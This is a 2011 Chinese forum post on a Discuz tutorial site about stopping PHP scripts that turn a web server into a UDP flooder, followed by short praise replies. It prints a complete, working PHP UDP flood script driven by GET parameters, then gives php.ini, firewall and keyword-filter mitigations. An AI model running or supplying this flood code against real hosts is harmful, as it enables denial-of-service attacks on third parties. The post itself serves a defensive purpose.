Discuz教程网

防止用户利用PHP代码DOS造成用光网络带宽

[复制链接]
authicon dly 发表于 2011-3-2 11:02:23 | 显示全部楼层 |阅读模式
一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是不断收到大量数据包.
用PHP代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:
代码如下:

  1. $packets = 0;
  2. $ip = $_GET[\'ip\'];
  3. $rand = $_GET[\'port\'];
  4. set_time_limit(0);
  5. ignore_user_abort(FALSE);
  6. $exec_time = $_GET[\'time\'];
  7. $time = time();
  8. print "Flooded: $ip on port $rand
  9. ";
  10. $max_time = $time+$exec_time;
  11. for($i=0;$i<65535;$i++){
  12. $out .= "X";
  13. }
  14. while(1){
  15. $packets++;
  16. if(time() > $max_time){
  17. break;
  18. }
  19. $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
  20. if($fp){
  21. fwrite($fp, $out);
  22. fclose($fp);
  23. }
  24. }
  25. echo "Packet complete at ".time(\'h:i:s\')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \\n";
  26. ?>
复制代码

表现特征:
一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是不断收到大量数据包.
解决办法:
禁止上述的代码:
在c:\windows\php.ini里设置:
disable_functions =gzinflate;
在c:\windows\php.ini里设其值为Off
allow_url_fopen = Off
并且:
;extension=php_sockets.dll
前面的;号一定要有,意思就是限制用sockets.dll
前面的;号要保留
然后重启IIS
如果上述方式仍然无效,你可以在IIS中,允许的扩展中,禁止PHP的扩展测试.
另外,对于没加密的php攻击代码,还可以用以下办法处理:
1.在IP策略,或防火墙中,禁止所有udp向外发送
2.用一流信息监控,在SQL拦截及网址拦截中,拦截port=这个关键词





上一篇:经典SQL语句大全word文档
下一篇:基于jQuery的简单的列表导航菜单
authicon icenna 发表于 2011-5-12 20:59:37 | 显示全部楼层
真的有意思!
authicon TRACYFLYING 发表于 2011-6-16 15:00:04 | 显示全部楼层
这个贴不错!!!
authicon D_hong 发表于 2011-6-21 08:59:58 | 显示全部楼层
顶顶更健康
authicon haidideyu 发表于 2011-6-22 02:00:02 | 显示全部楼层
喜欢喜欢喜欢
authicon 咫尺天 发表于 2011-6-22 12:00:12 | 显示全部楼层
顶顶更健康
authicon icenna 发表于 2011-6-23 21:59:57 | 显示全部楼层
这个不错呀
authicon D_hong 发表于 2011-6-25 07:59:40 | 显示全部楼层
好像不错的样子
authicon lilac_yao 发表于 2011-6-25 21:59:50 | 显示全部楼层
这个要顶起来啊
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

1314学习网 ( 浙ICP备10214163号 )

GMT+8, 2025-5-2 03:24

Powered by Discuz! X3.4

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表